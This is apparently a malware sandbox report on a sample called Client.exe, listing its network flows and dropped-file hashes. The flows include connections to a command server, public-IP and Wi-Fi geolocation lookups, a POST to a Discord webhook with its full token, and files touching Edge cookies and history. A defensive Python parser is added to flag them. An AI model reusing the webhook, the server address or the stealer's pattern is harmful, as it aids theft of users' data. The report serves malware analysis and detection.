• 193.161.193.99:64240  tls  Client.exe  74.5kB / 2.0MB  1095 / 1610
• 193.161.193.99:64240  tls  Client.exe  11.7kB / 2.2kB  28 / 25
• 193.161.193.99:64240  tls  Client.exe  3.6kB / 361 B  10 / 5
• 193.161.193.99:64240  tls  Client.exe  16.7kB / 1.3kB  40 / 28
• 193.161.193.99:64240  tls  Client.exe  94.8kB / 2.2kB  75 / 45
• 193.161.193.99:64240  tls  Client.exe  1.5kB / 361 B  8 / 5
• 104.16.185.241:80  http://icanhazip.com/  http  Client.exe  464 B / 1.3kB  8 / 5
    HTTP Request: GET http://icanhazip.com/
    HTTP Response: 200
    HTTP Request: GET http://icanhazip.com/
    HTTP Response: 200
• 208.95.112.1:80  http://ip-api.com/line/?fields=hosting  http  Client.exe  310 B / 347 B  5 / 4
    HTTP Request: GET http://ip-api.com/line/?fields=hosting
    HTTP Response: 200
• 104.21.44.66:443  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b  tls, http  Client.exe  814 B / 4.5kB  9 / 9
    HTTP Request: GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b
    HTTP Response: 200
• 162.159.128.233:443  https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true  tls, http  Client.exe  3.3kB / 4.8kB  11 / 10
    HTTP Request: POST https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true
    HTTP Response: 404
• 193.161.193.99:64240  tls  Client.exe  2.6kB / 790 B  20 / 12
• 193.161.193.99:64240  tls  Client.exe  508 B / 321 B  7 / 4
• 193.161.193.99:64240  tls  Client.exe  502 B / 401 B  7 / 6
• 193.161.193.99:64240  tls  Client.exe  456 B / 361 B  6 / 5
• 127.0.0.1:4449  Client.exe
• 193.161.193.99:64240  tls  Client.exe  14.5kB / 339.0kB  214 / 260
• 193.161.193.99:64240  tls  Client.exe  410 B / 241 B  5 / 2
• 193.161.193.99:64240  tls  Client.exe  456 B / 321 B  6 / 4
• 8.8.8.8:53  8.8.8.8.in-addr.arpa  dns  66 B / 90 B  1 / 1
    DNS Request: 8.8.8.8.in-addr.arpa
• 8.8.8.8:53  104.219.191.52.in-addr.arpa  dns  73 B / 147 B  1 / 1
    DNS Request: 104.219.191.52.in-addr.arpa
• 8.8.8.8:53  172.210.232.199.in-addr.arpa  dns  74 B / 128 B  1 / 1
    DNS Request: 172.210.232.199.in-addr.arpa
• 8.8.8.8:53  72.32.126.40.in-addr.arpa  dns  71 B / 157 B  1 / 1
    DNS Request: 72.32.126.40.in-addr.arpa
• 8.8.8.8:53  95.221.229.192.in-addr.arpa  dns  73 B / 144 B  1 / 1
    DNS Request: 95.221.229.192.in-addr.arpa
• 8.8.8.8:53  99.193.161.193.in-addr.arpa  dns  73 B
                                                                                                  131 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  99.193.161.193.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  58.55.71.13.in-addr.arpa
                                                                                                  dns
                                                                                                  70 B
                                                                                                  144 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  58.55.71.13.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  154.239.44.20.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                  158 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  154.239.44.20.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  200.163.202.172.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                  160 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  200.163.202.172.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  171.39.242.20.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                  158 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  171.39.242.20.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  60.153.16.2.in-addr.arpa
                                                                                                  dns
                                                                                                  70 B
                                                                                                  133 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  60.153.16.2.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  11.227.111.52.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                  158 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  11.227.111.52.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  google.com
                                                                                                  dns
                                                                                                  PING.EXE
                                                                                                  56 B
                                                                                                  72 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  google.com

                                                                                                  DNS Response

                                                                                                  142.250.180.14

                                                                                                • 8.8.8.8:53
                                                                                                  www.google.com
                                                                                                  dns
                                                                                                  msedge.exe
                                                                                                  60 B
                                                                                                  76 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  www.google.com

                                                                                                  DNS Response

                                                                                                  142.250.187.196

                                                                                                • 8.8.8.8:53
                                                                                                  196.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                  112 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  196.187.250.142.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  134.32.126.40.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                  158 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  134.32.126.40.in-addr.arpa

                                                                                                • 142.250.187.196:443
                                                                                                  www.google.com
                                                                                                  https
                                                                                                  msedge.exe
                                                                                                  16.4kB
                                                                                                  111.6kB
                                                                                                  72
                                                                                                  109
                                                                                                • 8.8.8.8:53
                                                                                                  227.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                  112 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  227.187.250.142.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  195.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                  112 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  195.187.250.142.in-addr.arpa

                                                                                                • 224.0.0.251:5353
                                                                                                  531 B
                                                                                                  8
                                                                                                • 8.8.8.8:53
                                                                                                  14.179.89.13.in-addr.arpa
                                                                                                  dns
                                                                                                  71 B
                                                                                                  145 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  14.179.89.13.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  icanhazip.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  59 B
                                                                                                  91 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  icanhazip.com

                                                                                                  DNS Response

                                                                                                  104.16.185.241
                                                                                                  104.16.184.241

                                                                                                • 8.8.8.8:53
                                                                                                  ip-api.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  56 B
                                                                                                  72 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  ip-api.com

                                                                                                  DNS Response

                                                                                                  208.95.112.1

                                                                                                • 8.8.8.8:53
                                                                                                  241.185.16.104.in-addr.arpa
                                                                                                  dns
                                                                                                  73 B
                                                                                                  135 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  241.185.16.104.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  1.112.95.208.in-addr.arpa
                                                                                                  dns
                                                                                                  71 B
                                                                                                  95 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  1.112.95.208.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  api.mylnikov.org
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  62 B
                                                                                                  94 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  api.mylnikov.org

                                                                                                  DNS Response

                                                                                                  104.21.44.66
                                                                                                  172.67.196.114

                                                                                                • 8.8.8.8:53
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  dns
                                                                                                  142 B
                                                                                                  133 B
                                                                                                  2
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  66.44.21.104.in-addr.arpa

                                                                                                  DNS Request

                                                                                                  66.44.21.104.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  discord.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  57 B
                                                                                                  137 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  discord.com

                                                                                                  DNS Response

                                                                                                  162.159.128.233
                                                                                                  162.159.136.232
                                                                                                  162.159.137.232
                                                                                                  162.159.135.232
                                                                                                  162.159.138.232

                                                                                                • 8.8.8.8:53
                                                                                                  233.128.159.162.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                  136 B
                                                                                                  1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  233.128.159.162.in-addr.arpa
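The rows above are the raw capture. The helper below is an added example written for this page, not Triage's code or output: it parses rows in the layout used above and runs the two checks a triager wants from a table like this. First, which process-attributed lookups hit a small watchlist of public-IP, geolocation and webhook hosts (the watchlist and its labels are the editor's assumption, not something the report states). Second, which reverse (PTR) lookups target addresses that no forward DNS answer in the capture produced, meaning the host already knew those peers by address. The sample rows are copied from this section.

```python
"""Triage helpers for the network rows above: parse them, then flag (1) process-
attributed lookups of watchlisted hosts and (2) PTR targets no forward answer explains."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Optional

# Editorial assumption, not from the report: services a stealer commonly uses to
# learn the victim's public IP / location, or to exfiltrate through webhooks.
WATCHLIST = {"icanhazip.com": "public IP lookup", "ip-api.com": "IP geolocation",
             "api.mylnikov.org": "Wi-Fi BSSID geolocation",
             "discord.com": "Discord webhook exfiltration channel"}

# Constructed sample: a subset of the report's rows, in the layout used above.
SAMPLE = """\
• 8.8.8.8:53  host 99.193.161.193.in-addr.arpa  proto dns  sent 73 B  recv 131 B  tx 1 / rx 1
    DNS Request: 99.193.161.193.in-addr.arpa
• 8.8.8.8:53  host google.com  proto dns  proc PING.EXE  sent 56 B  recv 72 B  tx 1 / rx 1
    DNS Request: google.com
    DNS Response: 142.250.180.14
• 142.250.187.196:443  host www.google.com  proto https  proc msedge.exe  sent 16.4kB  recv 111.6kB  tx 72 / rx 109
• 8.8.8.8:53  host icanhazip.com  proto dns  proc Client.exe  sent 59 B  recv 91 B  tx 1 / rx 1
    DNS Request: icanhazip.com
    DNS Response: 104.16.185.241, 104.16.184.241
• 8.8.8.8:53  host ip-api.com  proto dns  proc Client.exe  sent 56 B  recv 72 B  tx 1 / rx 1
    DNS Request: ip-api.com
    DNS Response: 208.95.112.1
• 8.8.8.8:53  host api.mylnikov.org  proto dns  proc Client.exe  sent 62 B  recv 94 B  tx 1 / rx 1
    DNS Request: api.mylnikov.org
    DNS Response: 104.21.44.66, 172.67.196.114
• 8.8.8.8:53  host discord.com  proto dns  proc Client.exe  sent 57 B  recv 137 B  tx 1 / rx 1
    DNS Request: discord.com
    DNS Response: 162.159.128.233, 162.159.136.232, 162.159.137.232, 162.159.135.232, 162.159.138.232
• 8.8.8.8:53  host 233.128.159.162.in-addr.arpa  proto dns  sent 74 B  recv 136 B  tx 1 / rx 1
    DNS Request: 233.128.159.162.in-addr.arpa
"""

# A bullet row: destination, then optional labelled fields in the order used above.
ROW_RE = re.compile(
    r"^•\s+(?P<dest>\S+)(?:\s+host\s+(?P<host>\S+))?(?:\s+proto\s+(?P<proto>\S+))?"
    r"(?:\s+proc\s+(?P<proc>\S+))?(?:\s+sent\s+[\d.]+\s?k?B)?(?:\s+recv\s+[\d.]+\s?k?B)?"
    r"(?:\s+tx\s+(?P<tx>\d+)(?:\s*/\s*rx\s+(?P<rx>\d+))?)?\s*$")
DETAIL_RE = re.compile(r"^\s+DNS (?P<kind>Request|Response):\s*(?P<val>.+?)\s*$")
PTR_SUFFIX = ".in-addr.arpa"

@dataclass
class Flow:
    destination: str
    host: Optional[str]
    proto: Optional[str]
    process: Optional[str]
    tx: Optional[int]
    rx: Optional[int]
    requests: list = field(default_factory=list)
    responses: list = field(default_factory=list)

def parse_flows(text: str) -> list:
    """One Flow per bullet row; indented DNS Request/Response lines attach to it."""
    flows = []
    for line in filter(str.strip, text.splitlines()):
        if m := ROW_RE.match(line):
            g = m.groupdict()
            flows.append(Flow(g["dest"], g["host"], g["proto"], g["proc"],
                              *(int(g[k]) if g[k] else None for k in ("tx", "rx"))))
        elif (d := DETAIL_RE.match(line)) and flows:
            lst = flows[-1].requests if d["kind"] == "Request" else flows[-1].responses
            lst.extend(v.strip() for v in d["val"].split(","))
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    return flows

def watchlist_hits(flows) -> list:
    """(process, host, reason) for process-attributed DNS lookups of watchlisted hosts."""
    return [(f.process, f.host, WATCHLIST[f.host])
            for f in flows if f.proto == "dns" and f.process and f.host in WATCHLIST]

def ptr_to_ip(name: Optional[str]) -> Optional[str]:
    """'99.193.161.193.in-addr.arpa' -> '193.161.193.99'; None for non-PTR names."""
    if not name or not name.endswith(PTR_SUFFIX):
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(name[:-len(PTR_SUFFIX)].split(".")))))
    except ipaddress.AddressValueError:
        return None

def unexplained_ptr_targets(flows) -> list:
    """Reverse-resolved IPs that no forward DNS answer in the capture produced: the host
    knew them by address, so compare them with any C2 config extracted from the sample."""
    answered = {ip for f in flows if f.proto == "dns" and not ptr_to_ip(f.host)
                for ip in f.responses}
    out = []
    for f in flows:
        ip = ptr_to_ip(f.host)
        if ip and ip not in answered and ip not in out:
            out.append(ip)
    return out

if __name__ == "__main__":
    parsed = parse_flows(SAMPLE)
    for hit in watchlist_hits(parsed):
        print("watchlist:", *hit)
    print("unexplained PTR targets:", unexplained_ptr_targets(parsed))
```

Run over the full table above, the first check isolates every lookup the sandbox attributed to Client.exe; the second separates PTR lookups that merely annotate a name the host had just resolved (the discord.com answer, for instance) from PTR lookups for addresses the host contacted without resolving any name, which are the ones to hold against the configuration extracted from the binary.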

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log
    Filesize  1KB
    MD5       baf55b95da4a601229647f25dad12878
    SHA1      abc16954ebfd213733c4493fc1910164d825cac8
    SHA256    ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
    SHA512    24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize  3KB
    MD5       556084f2c6d459c116a69d6fedcc4105
    SHA1      633e89b9a1e77942d822d14de6708430a3944dbc
    SHA256    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
    SHA512    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize  152B
    MD5       61cef8e38cd95bf003f5fdd1dc37dae1
    SHA1      11f2f79ecb349344c143eea9a0fed41891a3467f
    SHA256    ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
    SHA512    6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat  (second capture of the same path, different content)
    Filesize  152B
    MD5       0a9dc42e4013fc47438e96d24beb8eff
    SHA1      806ab26d7eae031a58484188a7eb1adab06457fc
    SHA256    58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
    SHA512    868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
    Filesize  215KB
    MD5       d79b35ccf8e6af6714eb612714349097

                                                                                                  SHA1

                                                                                                  eb3ccc9ed29830df42f3fd129951cb8b791aaf98

                                                                                                  SHA256

                                                                                                  c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

                                                                                                  SHA512

                                                                                                  f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  120B

                                                                                                  MD5

                                                                                                  5d37318befaff4168b81e7fddf87eefa

                                                                                                  SHA1

                                                                                                  50d26bd00c7bad6137e89cc01c34ca337923305a

                                                                                                  SHA256

                                                                                                  3e4a206034765843f35db411a4d880170e8ceb209fc54c25446327bada8108aa

                                                                                                  SHA512

                                                                                                  4dcad1be65dc417b32bb45e0dcde9275b35f40ae96b491c3b55197a98255f472877ce0074f8cfdded6705b6aaa66234d6b42093a5849dfaa5d16fe588895c0d8

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  120B

                                                                                                  MD5

                                                                                                  6501eab1e0f9bed1960778e0cf514e2c

                                                                                                  SHA1

                                                                                                  fbada7ba444f4dd91b367b3416d63d8785bbbe45

                                                                                                  SHA256

                                                                                                  f4844522a8f259092d983e64f5d0dfeba4f5128db6e39d2180354610b503874c

                                                                                                  SHA512

                                                                                                  7bd5223bb2d2a7bf8aa0d8d1295fcd55a0a6fa25a34c53729fe24da73c6c2bba77dbf33c1379e1afab78e35b69e982a4e5bf7f779d956f120413657af8d8f341

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                  Filesize

                                                                                                  20KB

                                                                                                  MD5

                                                                                                  9a507254daee01ccb19981c873af7e46

                                                                                                  SHA1

                                                                                                  310ae1ee2410f1ad5d64bea4a9b6b88346da361f

                                                                                                  SHA256

                                                                                                  801a16e38f58fa6016803dddbb32c5a217e6e4bd848213641f0bc04718f2b929

                                                                                                  SHA512

                                                                                                  483a0ed06295ce07c5a12e45a3aad9305074084cf3d6c17373d2fee2af917932537de8839868f81fb8121c88e1760e305ec2735562b9a845097fae969c99356c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                  Filesize

                                                                                                  124KB

                                                                                                  MD5

                                                                                                  97ba2c1c2754ecbff68fbe9e9fd5817b

                                                                                                  SHA1

                                                                                                  3eba96dd30d6a0dbbf93d33e7730aecc1cdaf2dc

                                                                                                  SHA256

                                                                                                  88d1c1f862e02e4893b289d152aeec4bc91ecffd124f7739508642a0de7648c3

                                                                                                  SHA512

                                                                                                  42e533c80175b7e7610768fe70a30a5a6ffa7e405de9a0787b9aa42df67235f5fe791e0020d8f7e6c47dfca74a0ea9af24d73f7bed609b69b8f403486e4eee33

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  846B

                                                                                                  MD5

                                                                                                  9bfb8744ca35a22d06e43def970c87ce

                                                                                                  SHA1

                                                                                                  81fef17284f4a95df975944d7ad5cfb57ce9af25

                                                                                                  SHA256

                                                                                                  e832e17833644cc91b856f96f1d27e03078b03d1c23fa0c6371551e0abd55bf8

                                                                                                  SHA512

                                                                                                  4a10043921da27371bccd59aa139214822d8b18cace6fb6922d2257f4756eae62730879b62eea67d191ab6292565ee2c4132016de025412dbc2282c1a5b695f9

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  2cf8f32e78601d42beb415ce757412d9

                                                                                                  SHA1

                                                                                                  12e66f06ae7d44079a2f5d484e3cb1e941d49143

                                                                                                  SHA256

                                                                                                  1eb57bcf5772b9dc314ac3e0411aae7ead747f54a991c5b70601eaffa0480c04

                                                                                                  SHA512

                                                                                                  1f04ed7f56cff8cac7948ff38b07d7f71377e2ba7e4d46ca6e7fc33008a96903faa9a40dc18799e2f6a3a971f4ca07493799cb72060b986c4cfe207a3d8dad13

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  3ea4a691f274eb731aaa6d5d08c644e1

                                                                                                  SHA1

                                                                                                  26d102b47a90b6a31d6572f1bfcde1618dd5f3f8

                                                                                                  SHA256

                                                                                                  ea25500fdd94b470ced626e27d4536800e36cd91ccd88cb9996cc96411edec6b

                                                                                                  SHA512

                                                                                                  377b04c52742aff5a4e7d472830998894c6329e4a5b14595c6e8e43696a54cf8493e23b4e4eab2757881f30b82ac65ea4d6753f8ba704ac23ad3569c0a7f736b

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  90a147141eae011f8d1e5af0c6f28a06

                                                                                                  SHA1

                                                                                                  259a57e1a23e9eea2930a394b68f80d93f7cfd98

                                                                                                  SHA256

                                                                                                  34254867521f1119dafd828495a40b04f960411b61a4929523d7ab101085ccee

                                                                                                  SHA512

                                                                                                  29817566169ebb37f29b7774769ef7ea9ad2fbda5fe44eca5f995a872b20451eb05bffca6bb5f231f4e2f020bf2ab768627c33d25460f067c1766c7248aa7b46

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                  Filesize

                                                                                                  16B

                                                                                                  MD5

                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                  SHA1

                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                  SHA256

                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                  SHA512

                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  f5f8af939a5cecd80fb1b8a3046fc782

                                                                                                  SHA1

                                                                                                  0ea36ff228293412ad394848b0d80345b2e506ab

                                                                                                  SHA256

                                                                                                  c23553b3cefe323e414746704aa58c371ea9b59b1f3b186e7673bfc4eeaa20a7

                                                                                                  SHA512

                                                                                                  a70bd3886e8b4849c8a2815a79478b9365df9e26a5d9ee092523d240a024c6cd7b5b769686b75811c56a0ad415a962ce376c5c6fa5600ec2fb7c092a150ae622

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  a92f35bd1ed9dd2ebc7ceb06517f8b49

                                                                                                  SHA1

                                                                                                  2ca8c61de1e2014eb525fdeccf3cf9fdbc8d091c

                                                                                                  SHA256

                                                                                                  18f12a82cff129620206710627a315a3779fe54f03d8a0ef98ff30fec46ea806

                                                                                                  SHA512

                                                                                                  b34463bf6aa68959003c28d0dd9a0f4cdaf81ccdcdb54bf006a0c49d9ebb4e7e13438890142a55b40a24fc2517629cb65845be481bfd6508d19960ced7367edf

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  d49246229b2077d7961ee5c90e0945f8

                                                                                                  SHA1

                                                                                                  8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

                                                                                                  SHA256

                                                                                                  581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

                                                                                                  SHA512

                                                                                                  5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                  MD5

                                                                                                  fb5f8866e1f4c9c1c7f4d377934ff4b2

                                                                                                  SHA1

                                                                                                  d0a329e387fb7bcba205364938417a67dbb4118a

                                                                                                  SHA256

                                                                                                  1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

                                                                                                  SHA512

                                                                                                  0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                  MD5

                                                                                                  8aaad0f4eb7d3c65f81c6e6b496ba889

                                                                                                  SHA1

                                                                                                  231237a501b9433c292991e4ec200b25c1589050

                                                                                                  SHA256

                                                                                                  813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                                                                                                  SHA512

                                                                                                  1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133809953868142651.txt

                                                                                                  Filesize

                                                                                                  75KB

                                                                                                  MD5

                                                                                                  580d7f8fa01f2fc90eea589b35ecd227

                                                                                                  SHA1

                                                                                                  cf9457d172ac3b6884f79188ec6e1308bf5d6f86

                                                                                                  SHA256

                                                                                                  e4573971cccf065c9abf262d2e45a1e5941c75165160078ee097012c8f35fcb6

                                                                                                  SHA512

                                                                                                  9a1bc8067caa0cd36728392884c9819858e4976a1af0b7cd0778ead266c0ae5300814314fbefe4fcd42f3a2ff89d03265102602e5758539b59c159c1f6470089

                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uf2jhfnb.4z0.ps1

                                                                                                  Filesize

                                                                                                  60B

                                                                                                  MD5

                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                  SHA1

                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                  SHA256

                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                  SHA512

                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                • C:\Users\Admin\AppData\Local\Temp\places.raw

                                                                                                  Filesize

                                                                                                  5.0MB

                                                                                                  MD5

                                                                                                  6567b8bf6394c215fc0164bdb6be9d49

                                                                                                  SHA1

                                                                                                  361068a8dbe48dd3f79de190a1fa507768970d5e

                                                                                                  SHA256

                                                                                                  5f5f264f10158983fa4ffabe7ee45293176979610d00594d19dccff33cd6f152

                                                                                                  SHA512

                                                                                                  0d2ae07e2b3f31e4cb9cfade4c7ea764d8f0da6042d3c09892720f8339ee32367cf566d9b8484b5adb7fe36d6ecca5d5d8d3c0418f5bcc45f6c437e54f6bd898

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpE715.tmp.dat

                                                                                                  Filesize

                                                                                                  114KB

                                                                                                  MD5

                                                                                                  2ba42ee03f1c6909ca8a6575bd08257a

                                                                                                  SHA1

                                                                                                  88b18450a4d9cc88e5f27c8d11c0323f475d1ae6

                                                                                                  SHA256

                                                                                                  a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd

                                                                                                  SHA512

                                                                                                  a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpE75A.tmp.dat

                                                                                                  Filesize

                                                                                                  116KB

                                                                                                  MD5

                                                                                                  f70aa3fa04f0536280f872ad17973c3d

                                                                                                  SHA1

                                                                                                  50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                  SHA256

                                                                                                  8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                  SHA512

                                                                                                  30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

• C:\Users\Admin\AppData\Local\Temp\tmpF00B.tmp.dat
  Filesize 40KB
  MD5     a182561a527f929489bf4b8f74f65cd7
  SHA1    8cd6866594759711ea1836e86a5b7ca64ee8911f
